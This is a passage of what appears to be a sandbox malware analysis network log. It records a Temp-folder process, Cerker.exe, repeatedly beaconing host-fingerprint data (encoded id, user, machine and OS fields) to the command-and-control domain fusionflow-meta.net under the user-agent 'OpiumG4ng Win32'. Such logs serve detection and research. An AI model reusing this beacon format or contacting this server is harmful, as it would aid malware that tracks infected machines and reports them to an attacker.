2024-08-31 20:42:38 UTC	690	IN	HTTP/1.1 200 OK Date: Sat, 31 Aug 2024 20:42:38 GMT Content-Type: text/html; charset=UTF-8 Transfer-Encoding: chunked Connection: close Expires: Thu, 19 Nov 1981 08:52:00 GMT Cache-Control: no-store, no-cache, must-revalidate Pragma: no-cache CF-Cache-Status: DYNAMIC Report-To: {"endpoints":[{"url":"https:\/\/a.nel.cloudflare.com\/report\/v4?s=FfR8ju4VFLqd7Wb2HeOaLJqPCGpu1nJLYg37q%2F9E%2FxsJW4nJg8Z1jttM5MyoUfnyZhAVzG3yBQfhPfW8Hj%2FJ%2BwWmxxYs97weYBiJxB1x%2B7USJYyxn1WhxWkg7W1UucHsGE6dYpOK"}],"group":"cf-nel","max_age":604800} NEL: {"success_fraction":0,"report_to":"cf-nel","max_age":604800} Server: cloudflare CF-RAY: 8bbfd9211a0a43b1-EWR alt-svc: h3=":443"; ma=86400
2024-08-31 20:42:38 UTC	7	IN	Data Raw: 32 0d 0a 4f 4b 0d 0a Data Ascii: 2OK
2024-08-31 20:42:38 UTC	5	IN	Data Raw: 30 0d 0a 0d 0a Data Ascii: 0

Session ID	Source IP	Source Port	Destination IP	Destination Port	PID	Process
21	192.168.2.4	49841	188.114.96.3	443	7020	C:\Users\user\AppData\Local\Temp\349587345342\Cerker.exe

Timestamp	Bytes transferred	Direction	Data
2024-08-31 20:42:52 UTC	305	OUT	GET /socket/?id=5BCFD53E0C18D2560D8AF0E193E31ACDB2D149DF00761FAB60CCD9453E79B0A1&us=04C689694C&mn=5F9DD53E0C1F&os=39C08968505B98415E8FB59C9BF11E8FF1C744CD51&bld=2DC8936D5355B11500CDF4E3C4AB49D3B4F7 HTTP/1.1 User-Agent: Mozilla/5.0(OpiumG4ng Win32) Host: fusionflow-meta.net Cache-Control: no-cache
2024-08-31 20:42:53 UTC	746	IN	HTTP/1.1 200 OK Date: Sat, 31 Aug 2024 20:42:53 GMT Content-Type: text/html; charset=UTF-8 Transfer-Encoding: chunked Connection: close Set-Cookie: PHPSESSID=4kmarlr4hm8v94p2gnjr7gusdp; path=/ Expires: Thu, 19 Nov 1981 08:52:00 GMT Cache-Control: no-store, no-cache, must-revalidate Pragma: no-cache CF-Cache-Status: DYNAMIC Report-To: {"endpoints":[{"url":"https:\/\/a.nel.cloudflare.com\/report\/v4?s=k2k4VRNOmdFiycbvdLYLmIN8JlNnq%2FPP8W%2BKgfaG0%2B8aMZhP9KtY0mQa1L4pCRdE3dGb%2BFpWmdWTibinT4EDRGQzowj7zqWG7Ykex3vMsWoeptguUxLu3CoUUWqWT5T34pVDQAoc"}],"group":"cf-nel","max_age":604800} NEL: {"success_fraction":0,"report_to":"cf-nel","max_age":604800} Server: cloudflare CF-RAY: 8bbfd97f3c747cfc-EWR alt-svc: h3=":443"; ma=86400
2024-08-31 20:42:53 UTC	7	IN	Data Raw: 32 0d 0a 4f 4b 0d 0a Data Ascii: 2OK
2024-08-31 20:42:53 UTC	5	IN	Data Raw: 30 0d 0a 0d 0a Data Ascii: 0

Session ID	Source IP	Source Port	Destination IP	Destination Port	PID	Process
22	192.168.2.4	49844	188.114.96.3	443	7020	C:\Users\user\AppData\Local\Temp\349587345342\Cerker.exe

Timestamp	Bytes transferred	Direction	Data
2024-08-31 20:42:53 UTC	351	OUT	GET /socket/?id=5BCFD53E0C18D2560D8AF0E193E31ACDB2D149DF00761FAB60CCD9453E79B0A1&us=04C689694C&mn=5F9DD53E0C1F&os=39C08968505B98415E8FB59C9BF11E8FF1C744CD51&bld=2DC8936D5355B11500CDF4E3C4AB49D3B4F7 HTTP/1.1 User-Agent: Mozilla/5.0(OpiumG4ng Win32) Host: fusionflow-meta.net Cache-Control: no-cache Cookie: PHPSESSID=4kmarlr4hm8v94p2gnjr7gusdp
2024-08-31 20:42:54 UTC	688	IN	HTTP/1.1 200 OK Date: Sat, 31 Aug 2024 20:42:54 GMT Content-Type: text/html; charset=UTF-8 Transfer-Encoding: chunked Connection: close Expires: Thu, 19 Nov 1981 08:52:00 GMT Cache-Control: no-store, no-cache, must-revalidate Pragma: no-cache CF-Cache-Status: DYNAMIC Report-To: {"endpoints":[{"url":"https:\/\/a.nel.cloudflare.com\/report\/v4?s=DRT0pd6lj4EiIguIstgaGTtCVrjwGPu0iOn87sIsXB1QKDivV2%2BDIOuGGXFxefwKICj5b%2BEPPtXqp7HUudDxKKoRgvC0OvasKCsSnuRCzh6%2BHiNEjPtlF8%2Fy5sManlrAdjfTGqpu"}],"group":"cf-nel","max_age":604800} NEL: {"success_fraction":0,"report_to":"cf-nel","max_age":604800} Server: cloudflare CF-RAY: 8bbfd986da2e42e8-EWR alt-svc: h3=":443"; ma=86400
2024-08-31 20:42:54 UTC	7	IN	Data Raw: 32 0d 0a 4f 4b 0d 0a Data Ascii: 2OK
2024-08-31 20:42:54 UTC	5	IN	Data Raw: 30 0d 0a 0d 0a Data Ascii: 0

Session ID	Source IP	Source Port	Destination IP	Destination Port	PID	Process
23	192.168.2.4	49847	188.114.96.3	443	7020	C:\Users\user\AppData\Local\Temp\349587345342\Cerker.exe

Timestamp	Bytes transferred	Direction	Data
2024-08-31 20:42:55 UTC	351	OUT	GET /socket/?id=5BCFD53E0C18D2560D8AF0E193E31ACDB2D149DF00761FAB60CCD9453E79B0A1&us=04C689694C&mn=5F9DD53E0C1F&os=39C08968505B98415E8FB59C9BF11E8FF1C744CD51&bld=2DC8936D5355B11500CDF4E3C4AB49D3B4F7 HTTP/1.1 User-Agent: Mozilla/5.0(OpiumG4ng Win32) Host: fusionflow-meta.net Cache-Control: no-cache Cookie: PHPSESSID=4kmarlr4hm8v94p2gnjr7gusdp
2024-08-31 20:42:56 UTC	680	IN	HTTP/1.1 200 OK Date: Sat, 31 Aug 2024 20:42:56 GMT Content-Type: text/html; charset=UTF-8 Transfer-Encoding: chunked Connection: close Expires: Thu, 19 Nov 1981 08:52:00 GMT Cache-Control: no-store, no-cache, must-revalidate Pragma: no-cache CF-Cache-Status: DYNAMIC Report-To: {"endpoints":[{"url":"https:\/\/a.nel.cloudflare.com\/report\/v4?s=HtK8innYn1xiFTTz04toSwHfTim1iVxc7GaR6C3yXmwlUOeWHAKavMxNJiWgTcIQEfFz6ahZ7hk5FPOLbkbcytHjlu4lEAoLfnUzOzX2QNrVpiAoudxUX687f1o2N7KlnDgaKNHD"}],"group":"cf-nel","max_age":604800} NEL: {"success_fraction":0,"report_to":"cf-nel","max_age":604800} Server: cloudflare CF-RAY: 8bbfd99108321a30-EWR alt-svc: h3=":443"; ma=86400
2024-08-31 20:42:56 UTC	7	IN	Data Raw: 32 0d 0a 4f 4b 0d 0a Data Ascii: 2OK
2024-08-31 20:42:56 UTC	5	IN	Data Raw: 30 0d 0a 0d 0a Data Ascii: 0

Session ID	Source IP	Source Port	Destination IP	Destination Port	PID	Process
24	192.168.2.4	49850	188.114.96.3	443	7020	C:\Users\user\AppData\Local\Temp\349587345342\Cerker.exe

Timestamp	Bytes transferred	Direction	Data
2024-08-31 20:42:56 UTC	351	OUT	GET /socket/?id=5BCFD53E0C18D2560D8AF0E193E31ACDB2D149DF00761FAB60CCD9453E79B0A1&us=04C689694C&mn=5F9DD53E0C1F&os=39C08968505B98415E8FB59C9BF11E8FF1C744CD51&bld=2DC8936D5355B11500CDF4E3C4AB49D3B4F7 HTTP/1.1 User-Agent: Mozilla/5.0(OpiumG4ng Win32) Host: fusionflow-meta.net Cache-Control: no-cache Cookie: PHPSESSID=4kmarlr4hm8v94p2gnjr7gusdp
2024-08-31 20:42:57 UTC	686	IN	HTTP/1.1 200 OK Date: Sat, 31 Aug 2024 20:42:57 GMT Content-Type: text/html; charset=UTF-8 Transfer-Encoding: chunked Connection: close Expires: Thu, 19 Nov 1981 08:52:00 GMT Cache-Control: no-store, no-cache, must-revalidate Pragma: no-cache CF-Cache-Status: DYNAMIC Report-To: {"endpoints":[{"url":"https:\/\/a.nel.cloudflare.com\/report\/v4?s=pXGQRGpcoYj5qloMEBPjHftqrXlYUHAlMe%2FCtr5RNINMqR%2B94DEqWlvyYfdoXFAurD%2FAT4kG0jkBLrt7ADMPpJuu6IxQSNnorAZZ7UAm4HUoWXkVeQsUnZsCmOJp5oQHiFajuyXK"}],"group":"cf-nel","max_age":604800} NEL: {"success_fraction":0,"report_to":"cf-nel","max_age":604800} Server: cloudflare CF-RAY: 8bbfd998ba6b32d0-EWR alt-svc: h3=":443"; ma=86400
2024-08-31 20:42:57 UTC	7	IN	Data Raw: 32 0d 0a 4f 4b 0d 0a Data Ascii: 2OK
2024-08-31 20:42:57 UTC	5	IN	Data Raw: 30 0d 0a 0d 0a Data Ascii: 0

Session ID	Source IP	Source Port	Destination IP	Destination Port	PID	Process
25	192.168.2.4	49852	188.114.96.3	443	7020	C:\Users\user\AppData\Local\Temp\349587345342\Cerker.exe

Timestamp	Bytes transferred	Direction	Data
2024-08-31 20:42:58 UTC	351	OUT	GET /socket/?id=5BCFD53E0C18D2560D8AF0E193E31ACDB2D149DF00761FAB60CCD9453E79B0A1&us=04C689694C&mn=5F9DD53E0C1F&os=39C08968505B98415E8FB59C9BF11E8FF1C744CD51&bld=2DC8936D5355B11500CDF4E3C4AB49D3B4F7 HTTP/1.1 User-Agent: Mozilla/5.0(OpiumG4ng Win32) Host: fusionflow-meta.net Cache-Control: no-cache Cookie: PHPSESSID=4kmarlr4hm8v94p2gnjr7gusdp
2024-08-31 20:42:58 UTC	698	IN	HTTP/1.1 200 OK Date: Sat, 31 Aug 2024 20:42:58 GMT Content-Type: text/html; charset=UTF-8 Transfer-Encoding: chunked Connection: close Expires: Thu, 19 Nov 1981 08:52:00 GMT Cache-Control: no-store, no-cache, must-revalidate Pragma: no-cache CF-Cache-Status: DYNAMIC Report-To: {"endpoints":[{"url":"https:\/\/a.nel.cloudflare.com\/report\/v4?s=%2FYF%2Fpk3%2BzYmP9v5YTY0xkAmAdMCQMdOymrtsUFh8zmR5Qf7dpk4G3O%2BWnXmEi%2BRN3KJ9pw%2FiPyWS6Cg42c15Ed0dEbT6X1L%2BhsvlyLBEV4J81Z%2BkdFAAB779jF2deOJDJv11%2Bvac"}],"group":"cf-nel","max_age":604800} NEL: {"success_fraction":0,"report_to":"cf-nel","max_age":604800} Server: cloudflare CF-RAY: 8bbfd9a11a257cb2-EWR alt-svc: h3=":443"; ma=86400
2024-08-31 20:42:58 UTC	7	IN	Data Raw: 32 0d 0a 4f 4b 0d 0a Data Ascii: 2OK
2024-08-31 20:42:58 UTC	5	IN	Data Raw: 30 0d 0a 0d 0a Data Ascii: 0

Session ID	Source IP	Source Port	Destination IP	Destination Port	PID	Process
26	192.168.2.4	49854	188.114.96.3	443	7020	C:\Users\user\AppData\Local\Temp\349587345342\Cerker.exe

Timestamp	Bytes transferred	Direction	Data
2024-08-31 20:42:59 UTC	351	OUT	GET /socket/?id=5BCFD53E0C18D2560D8AF0E193E31ACDB2D149DF00761FAB60CCD9453E79B0A1&us=04C689694C&mn=5F9DD53E0C1F&os=39C08968505B98415E8FB59C9BF11E8FF1C744CD51&bld=2DC8936D5355B11500CDF4E3C4AB49D3B4F7 HTTP/1.1 User-Agent: Mozilla/5.0(OpiumG4ng Win32) Host: fusionflow-meta.net Cache-Control: no-cache Cookie: PHPSESSID=4kmarlr4hm8v94p2gnjr7gusdp
2024-08-31 20:42:59 UTC	694	IN	HTTP/1.1 200 OK Date: Sat, 31 Aug 2024 20:42:59 GMT Content-Type: text/html; charset=UTF-8 Transfer-Encoding: chunked Connection: close Expires: Thu, 19 Nov 1981 08:52:00 GMT Cache-Control: no-store, no-cache, must-revalidate Pragma: no-cache CF-Cache-Status: DYNAMIC Report-To: {"endpoints":[{"url":"https:\/\/a.nel.cloudflare.com\/report\/v4?s=nhsJTJq%2F7MXhxE3iOXeXqsxIcnC4xv6itAenWNHXbM%2FvyNant0Ek8A%2BMaAOCUae1%2BweXnZ9IRvUOvNd4CDAjbiA5fDnleqEqtxxzWs4fnJKnovaSRF%2Br%2FLQ0DI7gaxyxUtdLmlU%2F"}],"group":"cf-nel","max_age":604800} NEL: {"success_fraction":0,"report_to":"cf-nel","max_age":604800} Server: cloudflare CF-RAY: 8bbfd9a9aade5e86-EWR alt-svc: h3=":443"; ma=86400
2024-08-31 20:42:59 UTC	7	IN	Data Raw: 32 0d 0a 4f 4b 0d 0a Data Ascii: 2OK
2024-08-31 20:42:59 UTC	5	IN	Data Raw: 30 0d 0a 0d 0a Data Ascii: 0

Session ID	Source IP	Source Port	Destination IP	Destination Port	PID	Process
27	192.168.2.4	49857	188.114.96.3	443	7020	C:\Users\user\AppData\Local\Temp\349587345342\Cerker.exe

Timestamp	Bytes transferred	Direction	Data
2024-08-31 20:43:00 UTC	351	OUT	GET /socket/?id=5BCFD53E0C18D2560D8AF0E193E31ACDB2D149DF00761FAB60CCD9453E79B0A1&us=04C689694C&mn=5F9DD53E0C1F&os=39C08968505B98415E8FB59C9BF11E8FF1C744CD51&bld=2DC8936D5355B11500CDF4E3C4AB49D3B4F7 HTTP/1.1 User-Agent: Mozilla/5.0(OpiumG4ng Win32) Host: fusionflow-meta.net Cache-Control: no-cache Cookie: PHPSESSID=4kmarlr4hm8v94p2gnjr7gusdp
2024-08-31 20:43:01 UTC	686	IN	HTTP/1.1 200 OK Date: Sat, 31 Aug 2024 20:43:01 GMT Content-Type: text/html; charset=UTF-8 Transfer-Encoding: chunked Connection: close Expires: Thu, 19 Nov 1981 08:52:00 GMT Cache-Control: no-store, no-cache, must-revalidate Pragma: no-cache CF-Cache-Status: DYNAMIC Report-To: {"endpoints":[{"url":"https:\/\/a.nel.cloudflare.com\/report\/v4?s=ln%2B%2FB6Akln114AxFXa0oCU819zkPHQSHSkLxL8RO3w8ECGlXRBKvZehsKGgdaWxWvxeIYjA9UMNQ0sWCEw6FAhmsQFKkhdh8xqBA3JI2B4BD9V6bRFHrUHfB%2F9JgIJ2nNX6EvnRg"}],"group":"cf-nel","max_age":604800} NEL: {"success_fraction":0,"report_to":"cf-nel","max_age":604800} Server: cloudflare CF-RAY: 8bbfd9b28d224390-EWR alt-svc: h3=":443"; ma=86400
2024-08-31 20:43:01 UTC	7	IN	Data Raw: 32 0d 0a 4f 4b 0d 0a Data Ascii: 2OK
2024-08-31 20:43:01 UTC	5	IN	Data Raw: 30 0d 0a 0d 0a Data Ascii: 0

Session ID	Source IP	Source Port	Destination IP	Destination Port	PID	Process
28	192.168.2.4	49859	188.114.96.3	443	7020	C:\Users\user\AppData\Local\Temp\349587345342\Cerker.exe

Timestamp	Bytes transferred	Direction	Data
2024-08-31 20:43:01 UTC	351	OUT	GET /socket/?id=5BCFD53E0C18D2560D8AF0E193E31ACDB2D149DF00761FAB60CCD9453E79B0A1&us=04C689694C&mn=5F9DD53E0C1F&os=39C08968505B98415E8FB59C9BF11E8FF1C744CD51&bld=2DC8936D5355B11500CDF4E3C4AB49D3B4F7 HTTP/1.1 User-Agent: Mozilla/5.0(OpiumG4ng Win32) Host: fusionflow-meta.net Cache-Control: no-cache Cookie: PHPSESSID=4kmarlr4hm8v94p2gnjr7gusdp
2024-08-31 20:43:02 UTC	688	IN	HTTP/1.1 200 OK Date: Sat, 31 Aug 2024 20:43:02 GMT Content-Type: text/html; charset=UTF-8 Transfer-Encoding: chunked Connection: close Expires: Thu, 19 Nov 1981 08:52:00 GMT Cache-Control: no-store, no-cache, must-revalidate Pragma: no-cache CF-Cache-Status: DYNAMIC Report-To: {"endpoints":[{"url":"https:\/\/a.nel.cloudflare.com\/report\/v4?s=NZk28oGRdjI%2B5I90ej2j4bxbrkecPnCcvfBFLamahena%2BqR9BNtIVIbep94wtYgUXu%2F2nZxJX1uGfvotpmWXhp27ELqTd%2FTcvBSHznPaIm8II9I2YH1BajjWJ8AVyq983mmuiwDF"}],"group":"cf-nel","max_age":604800} NEL: {"success_fraction":0,"report_to":"cf-nel","max_age":604800} Server: cloudflare CF-RAY: 8bbfd9b9caa5438a-EWR alt-svc: h3=":443"; ma=86400
2024-08-31 20:43:02 UTC	7	IN	Data Raw: 32 0d 0a 4f 4b 0d 0a Data Ascii: 2OK
2024-08-31 20:43:02 UTC	5	IN	Data Raw: 30 0d 0a 0d 0a Data Ascii: 0

Session ID	Source IP	Source Port	Destination IP	Destination Port	PID	Process
29	192.168.2.4	49862	188.114.96.3	443	7020	C:\Users\user\AppData\Local\Temp\349587345342\Cerker.exe

Timestamp	Bytes transferred	Direction	Data
2024-08-31 20:43:03 UTC	351	OUT	GET /socket/?id=5BCFD53E0C18D2560D8AF0E193E31ACDB2D149DF00761FAB60CCD9453E79B0A1&us=04C689694C&mn=5F9DD53E0C1F&os=39C08968505B98415E8FB59C9BF11E8FF1C744CD51&bld=2DC8936D5355B11500CDF4E3C4AB49D3B4F7 HTTP/1.1 User-Agent: Mozilla/5.0(OpiumG4ng Win32) Host: fusionflow-meta.net Cache-Control: no-cache Cookie: PHPSESSID=4kmarlr4hm8v94p2gnjr7gusdp
2024-08-31 20:43:04 UTC	684	IN	HTTP/1.1 200 OK Date: Sat, 31 Aug 2024 20:43:03 GMT Content-Type: text/html; charset=UTF-8 Transfer-Encoding: chunked Connection: close Expires: Thu, 19 Nov 1981 08:52:00 GMT Cache-Control: no-store, no-cache, must-revalidate Pragma: no-cache CF-Cache-Status: DYNAMIC Report-To: {"endpoints":[{"url":"https:\/\/a.nel.cloudflare.com\/report\/v4?s=BJ8SLl4zNxKISZr3Ut7FZYCG5mWbdM5VyohR8U0j9sXWa%2Bh4lJOg41e3lPthv9rAlZrL5AFdTIM%2FZGw4bSDIxrlvJeRdg5nJ29YzOKU95gfQFPDkACdQy350pnlM2U2oZDqPW4Fl"}],"group":"cf-nel","max_age":604800} NEL: {"success_fraction":0,"report_to":"cf-nel","max_age":604800} Server: cloudflare CF-RAY: 8bbfd9c2e9af4374-EWR alt-svc: h3=":443"; ma=86400
2024-08-31 20:43:04 UTC	7	IN	Data Raw: 32 0d 0a 4f 4b 0d 0a Data Ascii: 2OK
2024-08-31 20:43:04 UTC	5	IN	Data Raw: 30 0d 0a 0d 0a Data Ascii: 0

Session ID	Source IP	Source Port	Destination IP	Destination Port	PID	Process
30	192.168.2.4	49864	188.114.96.3	443	7020	C:\Users\user\AppData\Local\Temp\349587345342\Cerker.exe

Timestamp	Bytes transferred	Direction	Data
2024-08-31 20:43:04 UTC	351	OUT	GET /socket/?id=5BCFD53E0C18D2560D8AF0E193E31ACDB2D149DF00761FAB60CCD9453E79B0A1&us=04C689694C&mn=5F9DD53E0C1F&os=39C08968505B98415E8FB59C9BF11E8FF1C744CD51&bld=2DC8936D5355B11500CDF4E3C4AB49D3B4F7 HTTP/1.1 User-Agent: Mozilla/5.0(OpiumG4ng Win32) Host: fusionflow-meta.net Cache-Control: no-cache Cookie: PHPSESSID=4kmarlr4hm8v94p2gnjr7gusdp
2024-08-31 20:43:05 UTC	686	IN	HTTP/1.1 200 OK Date: Sat, 31 Aug 2024 20:43:05 GMT Content-Type: text/html; charset=UTF-8 Transfer-Encoding: chunked Connection: close Expires: Thu, 19 Nov 1981 08:52:00 GMT Cache-Control: no-store, no-cache, must-revalidate Pragma: no-cache CF-Cache-Status: DYNAMIC Report-To: {"endpoints":[{"url":"https:\/\/a.nel.cloudflare.com\/report\/v4?s=KJxUtSZMSXUk829QKkeuWuCMMhRdNCxoCTRjCUq%2FZQy2I7PlSQ%2FXWiWBVUStk9BxOkYvhXp5QG2RhqVVzjyAWCbBZEuuZ7wwoYNy0u6x%2FPdnbc6Jg13Bc1njTlWLHuUzHxG2bwB2"}],"group":"cf-nel","max_age":604800} NEL: {"success_fraction":0,"report_to":"cf-nel","max_age":604800} Server: cloudflare CF-RAY: 8bbfd9ca6d861986-EWR alt-svc: h3=":443"; ma=86400
2024-08-31 20:43:05 UTC	7	IN	Data Raw: 32 0d 0a 4f 4b 0d 0a Data Ascii: 2OK
2024-08-31 20:43:05 UTC	5	IN	Data Raw: 30 0d 0a 0d 0a Data Ascii: 0

Session ID	Source IP	Source Port	Destination IP	Destination Port	PID	Process
31	192.168.2.4	49867	188.114.96.3	443	7020	C:\Users\user\AppData\Local\Temp\349587345342\Cerker.exe

Timestamp	Bytes transferred	Direction	Data
2024-08-31 20:43:05 UTC	351	OUT	GET /socket/?id=5BCFD53E0C18D2560D8AF0E193E31ACDB2D149DF00761FAB60CCD9453E79B0A1&us=04C689694C&mn=5F9DD53E0C1F&os=39C08968505B98415E8FB59C9BF11E8FF1C744CD51&bld=2DC8936D5355B11500CDF4E3C4AB49D3B4F7 HTTP/1.1 User-Agent: Mozilla/5.0(OpiumG4ng Win32) Host: fusionflow-meta.net Cache-Control: no-cache Cookie: PHPSESSID=4kmarlr4hm8v94p2gnjr7gusdp
2024-08-31 20:43:06 UTC	692	IN	HTTP/1.1 200 OK Date: Sat, 31 Aug 2024 20:43:06 GMT Content-Type: text/html; charset=UTF-8 Transfer-Encoding: chunked Connection: close Expires: Thu, 19 Nov 1981 08:52:00 GMT Cache-Control: no-store, no-cache, must-revalidate Pragma: no-cache CF-Cache-Status: DYNAMIC Report-To: {"endpoints":[{"url":"https:\/\/a.nel.cloudflare.com\/report\/v4?s=Ms%2FqK%2B8jl865rxC4lignUyD9xKLbfuuNE4SXTYEh69HwWujxJUbOIfLAWYIKa%2FbWFYR1ycmkqMvNF4eSNGg1HLO1cGmyRpVK85XX%2BqaATePsootXucsjg1IbS%2BHiXnp%2BFvcrSKqU"}],"group":"cf-nel","max_age":604800} NEL: {"success_fraction":0,"report_to":"cf-nel","max_age":604800} Server: cloudflare CF-RAY: 8bbfd9d2bc15c323-EWR alt-svc: h3=":443"; ma=86400
2024-08-31 20:43:06 UTC	7	IN	Data Raw: 32 0d 0a 4f 4b 0d 0a Data Ascii: 2OK
2024-08-31 20:43:06 UTC	5	IN	Data Raw: 30 0d 0a 0d 0a Data Ascii: 0

Session ID	Source IP	Source Port	Destination IP	Destination Port	PID	Process
32	192.168.2.4	49869	188.114.96.3	443	7020	C:\Users\user\AppData\Local\Temp\349587345342\Cerker.exe

Timestamp	Bytes transferred	Direction	Data
2024-08-31 20:43:07 UTC	351	OUT	GET /socket/?id=5BCFD53E0C18D2560D8AF0E193E31ACDB2D149DF00761FAB60CCD9453E79B0A1&us=04C689694C&mn=5F9DD53E0C1F&os=39C08968505B98415E8FB59C9BF11E8FF1C744CD51&bld=2DC8936D5355B11500CDF4E3C4AB49D3B4F7 HTTP/1.1 User-Agent: Mozilla/5.0(OpiumG4ng Win32) Host: fusionflow-meta.net Cache-Control: no-cache Cookie: PHPSESSID=4kmarlr4hm8v94p2gnjr7gusdp
2024-08-31 20:43:08 UTC	684	IN	HTTP/1.1 200 OK Date: Sat, 31 Aug 2024 20:43:08 GMT Content-Type: text/html; charset=UTF-8 Transfer-Encoding: chunked Connection: close Expires: Thu, 19 Nov 1981 08:52:00 GMT Cache-Control: no-store, no-cache, must-revalidate Pragma: no-cache CF-Cache-Status: DYNAMIC Report-To: {"endpoints":[{"url":"https:\/\/a.nel.cloudflare.com\/report\/v4?s=60ybRaT%2FrrhJhD444lRGQNmywf2jepp2U1BK2zWyOyz07%2FBX7MgxUzKTqjnpaQFUROCw6BYcrnUYhTyfF0Ft7BYloP1k6kxoZC7NkT2uc5yHKeKN4q4tlWpSfxBctBQqFB68Vc6d"}],"group":"cf-nel","max_age":604800} NEL: {"success_fraction":0,"report_to":"cf-nel","max_age":604800} Server: cloudflare CF-RAY: 8bbfd9dbc99642bf-EWR alt-svc: h3=":443"; ma=86400
2024-08-31 20:43:08 UTC	7	IN	Data Raw: 32 0d 0a 4f 4b 0d 0a Data Ascii: 2OK
2024-08-31 20:43:08 UTC	5	IN	Data Raw: 30 0d 0a 0d 0a Data Ascii: 0

Session ID	Source IP	Source Port	Destination IP	Destination Port	PID	Process
33	192.168.2.4	49872	188.114.96.3	443	7020	C:\Users\user\AppData\Local\Temp\349587345342\Cerker.exe

Timestamp	Bytes transferred	Direction	Data
2024-08-31 20:43:08 UTC	351	OUT	GET /socket/?id=5BCFD53E0C18D2560D8AF0E193E31ACDB2D149DF00761FAB60CCD9453E79B0A1&us=04C689694C&mn=5F9DD53E0C1F&os=39C08968505B98415E8FB59C9BF11E8FF1C744CD51&bld=2DC8936D5355B11500CDF4E3C4AB49D3B4F7 HTTP/1.1 User-Agent: Mozilla/5.0(OpiumG4ng Win32) Host: fusionflow-meta.net Cache-Control: no-cache Cookie: PHPSESSID=4kmarlr4hm8v94p2gnjr7gusdp
2024-08-31 20:43:09 UTC	692	IN	HTTP/1.1 200 OK Date: Sat, 31 Aug 2024 20:43:09 GMT Content-Type: text/html; charset=UTF-8 Transfer-Encoding: chunked Connection: close Expires: Thu, 19 Nov 1981 08:52:00 GMT Cache-Control: no-store, no-cache, must-revalidate Pragma: no-cache CF-Cache-Status: DYNAMIC Report-To: {"endpoints":[{"url":"https:\/\/a.nel.cloudflare.com\/report\/v4?s=FEmJ%2B4Y3xim8H%2BfdBgdBOImgJFvDgL9N18GabeortWTyAHbICTHZ2ppBDftP8DfV8kEzm%2FQC%2B%2FDKhkuFbRQRAI%2FoH6VQROhReCVNAj1EMnBkztlh3wjH2KcAiKqbVIKuWCKFpFLd"}],"group":"cf-nel","max_age":604800} NEL: {"success_fraction":0,"report_to":"cf-nel","max_age":604800} Server: cloudflare CF-RAY: 8bbfd9e45b658c69-EWR alt-svc: h3=":443"; ma=86400
2024-08-31 20:43:09 UTC	7	IN	Data Raw: 32 0d 0a 4f 4b 0d 0a Data Ascii: 2OK
2024-08-31 20:43:09 UTC	5	IN	Data Raw: 30 0d 0a 0d 0a Data Ascii: 0

Session ID	Source IP	Source Port	Destination IP	Destination Port	PID	Process
34	192.168.2.4	49874	188.114.96.3	443	7020	C:\Users\user\AppData\Local\Temp\349587345342\Cerker.exe

Timestamp	Bytes transferred	Direction	Data
2024-08-31 20:43:10 UTC	351	OUT	GET /socket/?id=5BCFD53E0C18D2560D8AF0E193E31ACDB2D149DF00761FAB60CCD9453E79B0A1&us=04C689694C&mn=5F9DD53E0C1F&os=39C08968505B98415E8FB59C9BF11E8FF1C744CD51&bld=2DC8936D5355B11500CDF4E3C4AB49D3B4F7 HTTP/1.1 User-Agent: Mozilla/5.0(OpiumG4ng Win32) Host: fusionflow-meta.net Cache-Control: no-cache Cookie: PHPSESSID=4kmarlr4hm8v94p2gnjr7gusdp
2024-08-31 20:43:10 UTC	690	IN	HTTP/1.1 200 OK Date: Sat, 31 Aug 2024 20:43:10 GMT Content-Type: text/html; charset=UTF-8 Transfer-Encoding: chunked Connection: close Expires: Thu, 19 Nov 1981 08:52:00 GMT Cache-Control: no-store, no-cache, must-revalidate Pragma: no-cache CF-Cache-Status: DYNAMIC Report-To: {"endpoints":[{"url":"https:\/\/a.nel.cloudflare.com\/report\/v4?s=U2SJGCoY4Yne6QyqQ0jddJqnHeac1oUAB%2BuUYHuCecgSiBpUfvOYKfyy%2B2nfbEGRbO8cK1e%2FMPt0wlw9ynKoW4vzgnpsTsek%2BFCT%2BGD1YRFlk7tcahDAzO815hNSuJsX5Pu2EKfA"}],"group":"cf-nel","max_age":604800} NEL: {"success_fraction":0,"report_to":"cf-nel","max_age":604800} Server: cloudflare CF-RAY: 8bbfd9ed791e727a-EWR alt-svc: h3=":443"; ma=86400
2024-08-31 20:43:10 UTC	7	IN	Data Raw: 32 0d 0a 4f 4b 0d 0a Data Ascii: 2OK
2024-08-31 20:43:10 UTC	5	IN	Data Raw: 30 0d 0a 0d 0a Data Ascii: 0

Session ID	Source IP	Source Port	Destination IP	Destination Port	PID	Process
35	192.168.2.4	49877	188.114.96.3	443	7020	C:\Users\user\AppData\Local\Temp\349587345342\Cerker.exe

Timestamp	Bytes transferred	Direction	Data
2024-08-31 20:43:11 UTC	351	OUT	GET /socket/?id=5BCFD53E0C18D2560D8AF0E193E31ACDB2D149DF00761FAB60CCD9453E79B0A1&us=04C689694C&mn=5F9DD53E0C1F&os=39C08968505B98415E8FB59C9BF11E8FF1C744CD51&bld=2DC8936D5355B11500CDF4E3C4AB49D3B4F7 HTTP/1.1 User-Agent: Mozilla/5.0(OpiumG4ng Win32) Host: fusionflow-meta.net Cache-Control: no-cache Cookie: PHPSESSID=4kmarlr4hm8v94p2gnjr7gusdp
2024-08-31 20:43:11 UTC	690	IN	HTTP/1.1 200 OK Date: Sat, 31 Aug 2024 20:43:11 GMT Content-Type: text/html; charset=UTF-8 Transfer-Encoding: chunked Connection: close Expires: Thu, 19 Nov 1981 08:52:00 GMT Cache-Control: no-store, no-cache, must-revalidate Pragma: no-cache CF-Cache-Status: DYNAMIC Report-To: {"endpoints":[{"url":"https:\/\/a.nel.cloudflare.com\/report\/v4?s=R9W%2BdtYIRJA6q6E%2BMWZ%2B7tGw4ic3nNjNoTCwOz3PEmE7Hltb6is7%2F8Y1BkfSxZLhV1qIzpmZjsWiEp9RxkMWPnQWwR3U%2B0bfoP3OyhYDi8xdKWZjRQdCle4lu6atzU28h0kGFj61"}],"group":"cf-nel","max_age":604800} NEL: {"success_fraction":0,"report_to":"cf-nel","max_age":604800} Server: cloudflare CF-RAY: 8bbfd9f54b064356-EWR alt-svc: h3=":443"; ma=86400
2024-08-31 20:43:11 UTC	7	IN	Data Raw: 32 0d 0a 4f 4b 0d 0a Data Ascii: 2OK
2024-08-31 20:43:11 UTC	5	IN	Data Raw: 30 0d 0a 0d 0a Data Ascii: 0

Session ID	Source IP	Source Port	Destination IP	Destination Port	PID	Process
36	192.168.2.4	49879	188.114.96.3	443	7020	C:\Users\user\AppData\Local\Temp\349587345342\Cerker.exe

Timestamp	Bytes transferred	Direction	Data
